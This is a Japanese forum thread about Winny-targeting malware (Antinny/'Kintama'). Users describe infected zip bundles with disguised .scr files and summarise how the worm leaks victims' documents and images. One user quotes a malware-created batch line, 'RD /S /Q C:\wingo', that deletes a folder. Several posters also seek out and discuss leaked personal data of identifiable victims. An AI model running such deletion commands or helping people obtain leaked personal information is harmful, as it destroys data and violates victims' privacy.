バスターは対応遅いねぇ

京都府警 犯罪性の濃いものは
→http://www.pref.kyoto.jp/fukei/
ＡＣＣＳ(コンピュータソフトウェア著作権協会) アプリケーションは
→http://www.accsjp.or.jp/
ＪＡＳＲＡＣ(日本音楽著作権協会) 音楽データは
→http://www.jasrac.or.jp/
ＪＩＭＰＡ(日本国際映画著作権協会) 映画は
→http://www.jimca.co.jp/
ＪＣＡ(日本著作権機構) その他の事は
→http://jca.net-b.co.jp/
ＪＰＣＡ(日本写真著作権協会) 画像データは
→http://www.jpca.gr.jp/
ＪＶＣＡ(日本ビジュアル著作権協会) 画像データは
→http://www.jvca.gr.jp/

著作権情報センター
http://www.cric.or.jp/
任天堂
http://www.nintendo.co.jp/
ハドソン
http://www.hudson.co.jp/index.html
ソニー
http://www.sony.co.jp/

マイドキュメント（空白）.scr何個か落としたら入ってるのが違うものが幾つかあった

[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 女の名前[日付]（ファイル詰合せ）.zip
　　　｜
　　ZIPと同じ名前のフォルダ
　　　　　　｜→個人情報＊＊（数字）.txt（中身は「個人情報」が大量に書かれてる）
　　　　　　｜→マイドキュメント（空白）.scr


[仙台ギャラクシーエンジェルズ] [俺のデスクトップ]女の名前 [日付]（ファイル詰合せ）.zip
　　　　　　｜→ビン・ラディン携帯待ちうけ.gif
　　　　　　｜→高橋愛の写真.jpg
　　　　　　｜→（お宝）（事件）（犯罪）（ショタコン）（殺人）XXXXXXXXX.jpg　　（一応伏せとく）
　　　　　　｜（お宝）宇多田ヒカル-卒業名簿写真.jpg
　　　　　　｜マイドキュメント（空白）.scr


[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 女の名前[日付]（ファイル詰合せ）.zip
　　　　　　｜→password.txt　　（１０００件のアドレス等を３０回繰り返した３００００件分）
　　　　　　｜→マイドキュメント（空白）.scr


この三種類

ごめんなさい　ｓａｇｅ忘れてしまいました

先生ってAutorunとかSetupとか実行する前に中身を検査してくれるの？
それとも動かしたあとに対応してくれるだけ？

マイピクチャ（空白）.scrってのがありました
マイドキュメントとバイナリ比較したら一致したので同じものだと思います。

[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 女の名前[日付]（ファイル詰合せ）.zip
　　　　　｜
　　　同じ名前のフォルダ
　　　　　　　　｜→マイピクチャ（空白）.scr
　　　　　　　WinNT（空のフォルダ）
　　　　　　　　　　｜
　　　　　　　　　System32（空のフォルダ）

[仙台ギャラクシーエンジェルズ] [俺のデスクトップ]、多すぎ。

ファイル数22991まで逝った。容量は3.00 GB (3,231,717,544 バイト)。
もうやめだ、ヤメヤメ。きりがない。

２ちゃんねらの組織票に負けたどこかみたいな発言だな(w

それはさておき、晒し名称で統計とって「50名なんて少なすぎるぞ」と
イソプレスにたれこんでやってくださいませ。

ギャラクシーエンジェルといえばちとせがそれっポイ

おんなじやつが気がつかずに何度も放流されてるけど、感染者50人ってことはないだろう。

きっと、自分が見たいものしか目に入らないんだよ。

‥‥シックスセンス？

もうexeファイルを実行するときはさ
「EXEファイルだけど本当に実行しますか？」ってポップアップが出て
必ず再確認できるようにして欲しいよ

んなもんうざすぎ

>828
SP2入れれば？

仙台w2flで１晩検索してもまったく引っかからん
もちろん自分は感染してない
ほんとに流行ってるの？

ほんとに感染してないの？

デスクトップ画像をWinnyで流通させる正体不明のウイルス
〜ネットエージェント杉浦氏「開発者はほぼ特定」
ttp://internet.watch.impress.co.jp/cda/news/2004/11/08/5303.html

　　仙台もほ・・　　　クマ？
　 　∩＿＿＿∩　　 　　　　　　｜
　　 | ノ＼　　　　 ヽ　 　　　　　　|
　　/　　●゛　　● |　　　　 　　　|
　 |　∪　　( _●_)　ミ　 　　　　　j
　彡､　　　|∪|　　 |　　　 　　　 Ｊ
/　　　　 ∩ノ ⊃　 ヽ
(　 ＼　／ ＿ノ　|　 |
.＼　“　　／＿＿|　 |
　　＼ ／＿＿＿ ／

>>831

無視条件をクリアして再検索してみ

ておくれだったかな

テンプレを読んだうえでウイルスについて質問したいのですが初心者質問スレではないとの事なので
どこか適切なスレッドを教えてください。

>>836
わーい、釣りだ

>>836
セキュリティ
http://pc5.2ch.net/sec/

>>838
ありがとうございました。助かります。

[System]
Path=C:\WINDOWS\System32\SystemDll
Trip=
[Winny Setting]
Path=C:\Documents and Settings\Owner\My Documents
Trip=

あれ・・・・・？

>>840
感染おめでとう

よし、今日は赤飯だ

やめてよお赤飯なんて！お父さんにばれるでしょ！

よし、今日はいか飯だ

システムDドライブでCドライブ自体がつないでないんですが
以前exe押し間違えたあと再インスコしたnyのファイルが残ってただけだと信じたい…

で、これ何のウイルス？

よし、今日は栗ご飯だ

俺なんか残飯だ(´･ω･`)

一日三食食べたい
一日三食食べたい
一日三食食べたい

ここはひもじいスレになりました

x・）つ　ねこまんま

もう再インスコする方が早いのか・・・_no

>850
窓からPCを投げ捨てろ

>>850
ここで質問するよりそっちのが早いね

>>850
スカッと入れなおして、心もスカッとしようぜ。

九州の家具屋の顧客に個人情報流出の事実を
教えてやった香具師いる？

>854
面倒くさいことになるかもしれんし、関わらないほうがいいと思うぞ

>>855
みんなでやれば怖くな(ry

九州ってなに県？
福岡なら週末に特攻してもいいぞ。

ひろゆきブログ、Winnyについて語る。

【ファイル共有の未来は真っ暗、権利者にとっては。】
http://blog.livedoor.jp/hirox1492/archives/9022790.html

>>857
福岡だよ。

マジで？
何で検索したらそのファイル出てくるの？

>>860
[041104-2018][It's][eshop][Arc-shop][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

ウィルス製作者が特定されたってのははったりだろうけど
金玉製作者で逮捕されたら何よりも無茶苦茶かっこわりーな

>>861
サンクス。
ファイル落としたら報告します。

あの日韓掲示板を攻撃するウィルスきぼんぬ。

ぜんぜん見つからないorz

京都腐警なら製作者でっちあげて逮捕しそう||Φ|(|ﾟ|д|ﾟ|)|Φ||

むしろ犯人は警察関係者のような気がする

[私には好きな人がいます]のほうの仙台に
PTAに見つかったら家具屋よりダメージ受けそうな人のあるね

ニートみたいなゴミの意見なんて聞いてらんね('A`)
早く逮捕しちまえよ

NyやっててDownload板チェックしないなんてぶっちゃけ有り得ない
だってやってらんないじゃん性欲よりプライバシーでしょ

>>854
みそら保育園のやつね。でもあんまり面白くは無かった。

>>871
成績評価大盛りの2年Ｂ組担任数学教師のは見たか？

ではここで簡単なまとめ

・元祖仙台キンタマ（仙台ギャラクシーエンジェルズ）
　　エロゲの「ホットギミックフォーエバー」「こんねこ」「グリグリ２」に
　　それぞれ少しずつ違うタイプの実行ファイルとして混入
　　　　　　→ノートン先生がW32.SillyP2Pとして対策済
　　症状：壁紙を赤くする、ファイル詰合わせ放流、SS放流、ny関連のtxtから情報抽出して放流など
　　　　　時限発動でSS詰め合わせを（画像詰め合わせ）として放流かも？

・2次感染を狙ったもの（たぶん作者は仙台キンタマと同一）
　　仙台キンタマが放流する詰合わせに偽装したもの
　　（ユーザー名が2-3文字の女性名、トリップ無し）に
　　混在の.scr（スクリーンセーバ偽装）
　　　　　　→ノートン先生が Antinny.Gとして緊急対策済（次回定例更新時に反映）
　　　症状：HDD内から.doc　.xls　.txt　.jpgを検索してすべてを収集し
　　　　　　nyネットワークに放流する（恥ずかしい.jpg画像やメール送受信記録、Cookieなど）

結論：結局、仙台キンタマはブラフ、というか、仙台ギャラクシー〜といういかにも
　　　興味本位な野次馬が集まってきそうな餌を撒き、放流した詰め合わせ（餌）につられて
　　　集まってくる香具師を引っ掛けようとしたのが、女名トリップなしの詰め合わせ（.scr）
　　　ってことか。壮大な釣。

スクリーンセーバ偽装っていうのは最近出てきたものなの？

　　　 　 　 　 !　: ヽ.　 ,,:::''''　　　 ヽ. ____　　　　 　 ,. -' ､
　　　　　　　 l　 : : : :＼　　　　　　__’..’ 三ﾆY~ヽ´'''‐　 ヽ
　　　　 　 　 |　 : : : : : ヽ -,.r''´￣:.:.:.:.:..:.:.:.:.:.:.:ヾr'　　　 　 ',
　　　　　　　 l　 . : , ‐'´:／:.:.:.:.:.:.:.:.:.:.:.:.:.;_;.'´-:.:.:.:.ヽ―-､　　i
　　　　　　　 .l ／:.:.:.:, ':.:.:.:.:.:.:.:.:.:.:.:.::／...... 　 :.:.:.:.:.:.:.:.:.:.:.ヽ　 !
　　　　　　 ／:.:.:.:.:.:/:.:.:.:/:.:.:.:.:.:.::／:._:.:.:.:.:.:.:.:.:.....　 :.:.:.:.:.:.:ヽ. l
.　　　 　 , ':.:.:.:.:.:.:.:/:.:.:::/:.:.:.:.:._∠ニ..」:.:.:.:,:.:.:.:.:.:.:.:.:.:..　 :.:',:.:ｉ !
.　　 　 ,.':.:.:.:.:.:.:.:.:,':.:.::::/:.:.:.:.::;/-‐- ､ |｀ヽ|:.:.:.:.:.:.:.:.:.:.:.:.:.:... ',:.l′
.　　　/:.:.:.:.:.;.:.:.:.:.l,r'´ﾞi:.:,ｲ:.i´ｲ､ノ:::::}ヽ!/　l:.:.:.:.:.:.:./:.:.:.:.,:.:.:..ｉ:.|
　　 /:.:.:.:.:./:.:.:.:./　　 !,' l:.::l;':::::::::::::/　　　 l::.:.:.:./7ヽイ:.:.:.:.:l:.i
　　,':.:.:.:.::/:.:.:.:.:.:'､　　 !　l:::ヾ､::_,ﾝ′　　　 l;:; ,r/イ´〉:.:.:.:.ノ:,'
.　 ｉ:.:.:.:.::;':.:.:.:.／:.:.ヽ ___　 l:!　　　　　　　　 '/:::::::;ﾘ/ -‐'´:./
.　 !:.:.:::::i:.:.:／:.:.:.:.:.:.:＼ｌヽ　!　　　　　　　　 {､_ﾝ'　〃:.:::::./
　 l:.:.:::::l:.; ':.:.:.:.:,; -'´:.:.:.>''ヽ､　　　　 (⌒,　　｀　 ﾉ:.／!／　　　
　_l:::.:::::/_;:- '´:.:.;. -''´,. -―‐-r､_　　　　 __,. ‐'-'´ ／　　
. r'⌒ヾニ-ｧ^ヽ´,. '´/　　　　　 }:::.￣￣:.:.:/
　´, ヽ }/ /　　ヽ ＜　　　　 　 j::.:.:.:/:.:.:.; '
　ヾ-ｉ'r'.r'　　　 }　/ l　_　　 ,イ l､／:.／
　､:.:|'／　　 _r'　/　 ´　,ヽ/､l{_」ヾ.Y
　 ｀/._＿_,./　 /　　　 /　　　 ト'r '′

　　　　　ｼｭｯ
　（;´Д｀） ハァハァ
　Σ⊂彡_,,..i'"':
　　　　　|＼`､:　i'､
　　　　　＼＼`_',..-i
　　　　　　 ＼|_,..-┘

まとめを読んでいてふと思い出したが、
そういえば某業界人用スレで
ダミー作って流せみたいなことを
書いてる連中が居たなぁ〜…

とか言ってみるﾃｽﾂ。

まだNyのせいでCDが売れないと思ってる香具師がいるのか

>>878
さて、そういうお前の見解を聞いてみたいのだが。
お前はなぜCDが売れないと思う？

>>879
買う必要がないから

>>877
ここだな

プロテクト・違法コピー問題総合スレ Part10
http://pie.bbspink.com/test/read.cgi/erog/1093173937/

>>879
高いから(金出してまで聞きたくないから)

ｷﾞｬﾗｸｼｰって、萌え写真とか萌え動画とかの流失あったの？

遅かった＿|￣|○

>>881
なるほどな。俺は音楽配信サービスが主な原因かと思ってたが。
高いというのはもろに関係してくるか。

スレに関係ないことを聞いてしまったな。スマソ。

>>880
いや、見たのはソコじゃなかったな…
しかしどこのスレにも似たような奴が…

訴えればいいじゃん。

「善意の第三者であるぼきが！　せっかくはあはあしてあげようとﾀﾞｳｿしたのに
　トロイなんて仕込む極悪人がいるんでしゅよ！」とかさ。

さらにスレのレベルが下がってるな・・・

感染者は被害届出しておけよ
作者逮捕されたら損害賠償請求できるかもしれんよ

あ、でも修復してデリートした場合感染証明ってどうやってするのかな。
感染してる状態で警察呼んで見てもらわなきゃダメ？

コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html
コンピュータウイルス110番の電話もあるぞ

でも警察呼んだらお前逮捕されちゃうかもよｗ
m9(＾Д＾)ﾌﾟｷﾞｬｰｰｰｯ

>>889
そこらの警察呼んでも「クリックしても開きませんでした」って言われるのがヲチ

警官がみんな技能をもってないろくでなしだと思い込んでるのって素敵だわ

と、警官でありながらshareでバリバリ違法行為をしている>>893（ヤクザ？)が
おっしゃっております。

警官はみんなハッカーだよ

winnyとかキンタマとか警察も自衛隊も懲りたでしょう。
２ｃｈは日本の安全保障に役立ってるよね。

まぁ、スレ違いなんだが、2chぐらいで済んでよかったよな
諸外国なら、そんなゆるい組織はいい標的だもんな

キンタマのおかげでｎｙ作者逮捕って話もあるがな

被害届を出そうぜ。
証拠としてＨＤＤもってかれてハピー！ハピー！ハピー！

三日くらい前に .scr踏んだんだけど、
先生の最新定義でスキャンしても引っかからない。
感染してなかったと喜ぶべきなのかな…？

((((((；ﾟДﾟ))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

もう亜種が出たのか？

亜種なんてすぐに出回るだろ
知識ある人がその気になりゃ一日で新種も作れるし

>>900
(o^-')b　ｺﾝﾆﾁﾊ!!!

>>900
先生の5日定義だと引っかからなかった仙台.SCR(例の女性名晒し群)は
9日の定義(インテリアップの方ね)だとW32.Antinny.Gとしてひっかかった。

………あれキンタマだったの？(´･ω･`)最近名称がイイカゲン

自社のソフトも沢山流れてるのに対応しなきゃいけないのは複雑だよな

駆除履歴はフィードバックされるはずだからワレザー様一覧リストが出来上がりそうだ

>>906
ユーザー情報までは送信してないのでは？
と釣られてみるテスト

個体識別のためにシリアル相当のものは付けるんじゃあないか。
アンチウイルスの送信データを解析したひとっている？

うはあ。ひさしぶりにウィルス解析ミスったw
仮想とは言え酷い荒らし方だな… orz...
仙台は弱いけど、亜種が厄介だね。
気付けば良いけど気付かないとリブートでw
まあ、最初の犠牲者が報告すれば終わることでしょうけど。

なんか面白いの落としたいんだけど手当たり次第だとﾏﾝﾄﾞｸｾ

レジストリエディタはどこかにコピーしておいたほうがいいな

誰か家具やの奴うｐしてくれません？

>>912
厄介なことになりかねないから嫌だ。

nyで探せよ。

昨日から探してんだけど全然見つかんなくて・・・

何かタスク開く前にウインドウズのセキュリティのウインドウが出ますが、
そのログオン情報のユーザー名にNOEBOOK・・・・・。　　orz
これってウイルスでつかね・・・・。　　？？？？　　　

>>915
もうだめぽ

>>915
PCを窓から投げ捨てろ

あ、修正・・・・。
ユーザー名にNOEBOOK＝＞ユーザー名の後に\NOTEBOOK

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

>>919
安易に曝すのはまずいよ、コレ。
もし、Nyで流れている資料のせいで商売が上手くいかなくなったり顧客を失ったりした場合、
被害者は、”とりあえず”こういう風に曝している人を訴えるだろうから。IP特定可能だし。

【使用OS】 ＸＰ　Home（ＳＰ２対応済み）
【WindowsUpdateしてるか】 一昨日しました・・・・。
【AntiVirusは】先生の２００３してます。
【ちゃんとUpdateしてるか】 昨日定義落として入れたばっかりです。
【スキャンした結果】 なにもなし
【オンラインスキャンしたならその結果は】↑に同じ
【Winnyのﾊﾞｰｼﾞｮﾝ】 b7.1
【Winny歴、総DL量は】 1年、分からない。
【テンプレを読んだか】 Part27ぐらいからずっとみてます。
【テンプレにある対策を実行したか】 してます。

症状は、ようこそ画面を拒否して、
Ctrl+Alt+Del押したら、出てくるログオン情報のとこに
ユーザー名の前にNOTEBOOK\がついてるだけです。

>>912
これっぽい。
↓
http://tmp4.2ch.net/test/read.cgi/download/1099799904/19

>>920
晒そうが晒すまいが見つかるのは時間の問題
ウイルスや晒した人間の所為にできるなら感染を装った大暴露祭りになる悪寒

>>921
確かにそれはおかしいと思うが、exeを踏んだ覚えはないわけだろ？

仮に新種のウイルスだったとして、仙台のようになにかのファイルに偽装されてたとしたら、
もっと被害者が出て騒ぎになるはず。作者は出来るだけ広範囲にばら撒きたいだろうからな。

しばらく情報収集だな。システムに異変が起きた時に備えて大事なファイルをバックアップ
しておくことをお勧めする。

こんなのに引っかかる連中は、どうせバックアップファイル自体にウイルスが混入してるんだろうな。

>>924
サンクス！
念のためにwindows板にも行ってみます。バグってのもありえなくはなさそうなので・・・。

「新しいバージョンのwinnyノード接続がありました」が
「新しいバージョンのkintamaウイルスがありました」に見える

>>927
ガクガクブルブル・・・・・。
気のせいじゃないかもよ・・・・。（ﾆﾔｿ）

Ｃドライブにtask.batというMS-DOSのパッチファイルがあって、
作成日時がちょうど .scrを踏んだ時間あたり。
開いてみたら、同じ階層にあったWINGOというファイルが消えました。
何かやっちゃったんでしょうか？

>>929
バッチファイルの中身を晒してくれ。

>>930
スキルがないです。

>>931
.batの中身が晒せないレベルならPCを窓から(ry

>>931
バッチファイルを右クリックして「編集」を選んだら、メモ帳で
中身が確認できる。短いようならそのままコピペでよろしく。

一定時間ＷＩＮＮＹを起動してるとＵＰフォルダに適当なファイル（同じハードディスク内のデータ）が
放り込まれてるのですがバスターで検索しても引っかからないです。
ＥＸＥ踏んだ記憶は無いのですが何か検索or対処法ありますでしょうかＯＴＺ

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
lllllllllllllllllllll /￣ヽllllllllllllllllllllllllllllllllllllll
iiiiiiiiiiiiiiiiiiiiii　 あ　.iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
iiiiiiiiiiiiiiiiiiiii|　 き　 |iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
;;;;;;;;;;;;;;;;;;;;;|　 ら　 |;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;|　 め　 |;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;:;:;:;:;:;:;:;:;:;:;|　 た　 |:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:
;:;:;:;:;:;:;:;:;:;:;|　 ら　 |:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:
:.:.:.:.:.:.:.:.:.:.:ヽ、？ /.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:
:. :. :. :. :. :. :. :. ‐‐':. :. :. :. :. :. :. :. :. :. :. :.
: : : : : : : : : : : : : : : : : : : : : : : :　,.‐- 、 : : : :
　　　　　　　　　　　　　　　　　　廴ﾐﾉ
　　　　　　　　　　　　　　　　　／//¨' ､
　　　　　　　　　　　　　　　　 y':;:;:;:/⌒i!
　　　　　　　　　　　　　　　　�J:;:;:;:;};:;:/;},
　　　　　　;il||||li'　　　　　　　t`'---‐';:;:;:l
　　　　 ,.r'"''､,┘　　　　　　　 7;:;:;:;:;:;:;:;「
　　　　ﾉ4　(⌒i　　　　　　　　.}:;:;:;:;:;:;;/
　　　/..,__彡{, |　　　　　　　　　`i:;:;:;:;:;}
　　 （　　.ミi!} l､　　　　　　　　　.」:;:;:丿
　　ｸｭ二二`Lっ)　　　　　　　　`==='

そのAAはヤメレw

>>933
RD /S /Q C:\wingo

こんだけでした。

ﾊｧ？
RDって単にフォルダを消すだけのコマンドじゃん。
釣り？

>>938
マジです。
.scrを踏んだときにもnyのupfolderにsystem32\networkへのpathができて、
ただそんだけだったんですけど。
レジストリの追加やsvchost32.exeみたいなフォルダは出来てなかったかと…。

なんかエロゲも動かしてないしｎｙも入れてないのにいつの間にか感染してた。
不思議。

スレタイ変えて次スレ立てましたが、問題があるようなら削除依頼を出します。

Winnyを狙ったワーム・ウイルス構造解析 Part31
http://tmp4.2ch.net/test/read.cgi/download/1100072614/

>>941
激しく乙

|∀･)･･･ｺｿｰﾘ

>>940
電波でも感染するよ

違法ファイル落としてるなんて堂々と断言するわけにもいかないので、
みんな何となく何をどうしたのか誤魔化してるから

童貞なのに性病に感染していそうで怖いという話ばかりのように思えるな・・・

>>945
童貞でも性病にはなるよ

ｎｙでダウンロードしてる途中、買い物にいって帰ってくるとＰＣが突然再起動。
その後ウインドウズが立ち上がらなくなってしまいました。

●ＢＩＯＳの画面は出ます。
●再インストールも出来そうです。修復インストはダメ。
●セキュリティソフトはいれてました。ソースネクストの。
●最近作った新しいアカウントでログインしてました。
●ＳＰ２でした。
●電源を入れるとＨＤＤにアクセスした途端、文字化けっぽい字（文？）が一行出てそれっきり。
●落としたのは動画ばかり。
●前１時間はファイルの実行などはしていない。
覚えてることを並べてみました。

いろいろ原因を探してみたのですが出てないみたいなので
誰かわかる方がいらっしゃったら教えてください。

システムファイルの予期せぬクラッシュ
別HDDにシステム入れてデータを吸い取ろう

あ、そうなんですか
素早いレスありがとうございました。

ソースネクストかよｗ

【Linux】 - KNOPPIX 7
http://pc5.2ch.net/test/read.cgi/linux/1094401227/

Windowsが起動せんでも
これいれればファイルがどうなってるのかぐらいは初心者でもわかるし
LANがあるならデータを転送できる。

ディスクやけないなら本屋でUNIXか/Linux雑誌買えば大抵ついてるしな

＞950
ありがとうございます。早速やってみます。
＞949
お恥ずかしい。フリーよりはいいかなと入れたんですけど、なんだか不安定で困ってました。

埋めのつもりでつい答えちまった
反省してさらに埋め

自分にレスしてしまいました(恥）
同じ方でした。スミマセン。

兄貴画像ください

家具屋の奴全然見つかんないorz
仙台ギャラクシーエンジェルズ][俺のデスクトップ].jpg多数とzipが二つくらいしか出てこない。
感染はしてないはずだけど。
エロゲクラスタってクラスタワードをエロゲにするの？
それとも僻地へなんたらにするの？

マターリ汁

(´･ω･`)は〜い...

>955
僻地

家具屋ｷﾀ━ (ﾟ∀ﾟ) ━ ━ ━ ━ ｯ!! 　
もし特攻してその店潰れたりしたらみんな引く？

さすがに引く

じゃあ店長の顔と犯行に使ったと思われるｐｃだけ見てくる。

顧客に情報漏れちくるのがいい所かな

近頃、仙台のjpgがバカスカと中継でキャッシュに溜まる。
やばいよこれ。

そのままキャッシュで放流してるからおんなじのが何枚もたまってウザい。
おんなじ香具師が時間差で何枚もうｐされてるのもあるし。
あれって気がつかないのか、ほかの人の名前をかたってわざと流してるのか・・・

肝心の本体の入ったグリーん具りーん2って何なんだろ

訂正
仙台の本体が入ったグリーングリーン2はどれだろう

この連中は、ここまで来ても金を出して買う気はないっと........ ψ(.. ) ﾒﾓﾒﾓ

>>967
ここまで来てもって言うか、普段からここに居る連中はこんなのに感染してない

Whiter 踏みますた
(´▽｀*)ｱﾊﾊ

>>954
あぁっ、もうちょっと早く言ってくれれば
今しがた寄って来たビデオ屋で
兄貴なビデオが投売りされてたのに。

やっぱ参照量のおおいやつはウィルス入ってないみたいだね。
参照量多い順に3･4個落としてみても何とも無かったらしい

>>967
そっ<すの中の人ですか？
すまんて<の中の人ですか？
あるいは？

１）本来使われるレジストリ位置に便乗して起爆カウンターを設置。１０回起動で発動。
２）時限信管を設置。発売日一週間後以降に起動で発動。

どうよ。お試しするだけなら発動しない超両親設計。

新スレも立ったことだし

　　 　 　　　　　　 , '´ ￣￣ ` ､
　　　　　　　　　　i　r-ｰ-┬-‐､i
　 　 　　　　　　　|　|,,＿ 　 ＿,{|
　　　　　　　　　　Ｎ| "ﾟ'`　{"ﾟ｀lﾘ　　　　　　埋めないか？
　　　　 　 　 　 　 ﾄ.i 　 ,__''_　 !
　　　　 　 　　　／i/ l＼ ー .ｲ|､
　　　　,.､-　￣/ 　|　ｌ　 ￣ / |　|` ┬-､
　 　 /　 ヽ.　/ 　 　ト-` ､ノ- |　 l　　l　 ヽ.
　　/　　　 ∨ 　 　　l 　　|!　 | 　 ｀>　|　　i
　 /　　　　 |｀二^>　 ｌ.　　|　 |　＜＿_,|　　|
＿|　 　　　 |.|-<　　　 ＼ i　/　,イ_＿__!／ ＼
　 .|　　　　　{.|　 ` - ､ ,.---ｧ^!　| 　　 |￣￣￣￣￣￣￣￣￣￣￣l
＿_{ 　　＿__|└―ｰ／　￣´ |ヽ |＿__ﾉ＿＿＿＿＿＿＿＿＿＿＿_|
　　｝／ -=　ヽ__ - 'ヽ 　 -‐　,r'ﾞ　　　l　　　　　　　　　　　　　　　　　 |
＿_fﾞ/／￣￣　　　　　＿　-'　　　　 |＿＿＿＿＿ ,. - ￣　＼＿＿__|
　　| |　　- ￣　　　／　　　| 　 　 _　|￣￣￣￣ ／　　　　　　 ＼　￣|
＿__`＼ ＿＿　／　　　　＿l -￣　 l＿＿_　／　　　, /　　　 　ヽi＿__.|
￣￣￣　　　 |　　　 _ 二 =〒 ￣　 ｝￣ ／　　　　　l |　　　　　　!￣￣|
＿＿＿＿＿__l　　　　　　 -ヾ￣　　l／　　 　 　　 　l|　　 　　　 |＿＿_|

さすがに友達が感染すると
笑えんな

面白いウィルス出てこねーなぁ

>>975
友情なんてシャボン玉

|＿∧ 
|∀・,, ）親父、生めていいのか？ 
|Ｖ　　） 
|_|:____| 
|（_＿） 

次スレ
Winnyを狙ったワーム・ウイルス構造解析 Part31
http://tmp4.2ch.net/test/read.cgi/download/1100072614/

てめぇ、漢字間違えてんじゃねーよ
──　=≡∧＿∧　=！！ 
── =≡（　・∀・）　 ≡　　 　ｶﾞｯ　　 　 ∧＿∧ 
─　=≡○_　　 ⊂)_=_　 ＼ 从／-=≡ ｒ（ 　　　） 
──　=≡ >　　 ＿_　ノ )）< 　 ＞ 　-=　〉＃　 つ自分
─　=≡　 (　／　≡ 　　 ／VV＼-=≡⊂ ､>> 
── .=≡( ノ　=≡　　 　　　　　　　　-=　 し' 
￣￣￣￣￣￣￣￣￣| 
　 　 　 　 　 　 　 　 　 | 
　 　 　 　 　 　 　 　 　 | 
　 　 　 　 　 　 　 　 　 | 〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜 
　 　 　 　 　 　 　 　 　 | 　　　　　　A　n　t　i　n　n　y　湾 

　　　　　　　　　　　　　　☆ ﾁﾝ　　　　　　　　ﾏﾁｸﾀﾋﾞﾚﾀ〜 
　　　　　　　　　　　　　　　　　　　　　　　　　　　　ﾏﾁｸﾀﾋﾞﾚﾀ〜 
　　　 　 　 ☆　ﾁﾝ　　〃　　∧＿∧ 　 ／￣￣￣￣￣￣￣￣￣￣￣￣ 
　 　 　 　 　　ヽ　＿＿_＼（＼ﾟДﾟ）＜>> 埋めてーな(○ ｀人´ ○)　タノンマスー! 
　　 　 　 　 　 　 ＼＿／⊂　⊂＿)＿ ＼＿＿＿＿＿＿＿＿＿＿＿＿ 
　　 　 　 　 　 ／￣￣￣￣￣￣￣／| 
　　　　　　　　| ￣ ￣￣￣￣￣￣:|　:| 
　　　　　　　　|　　　　　　　　　　　 |／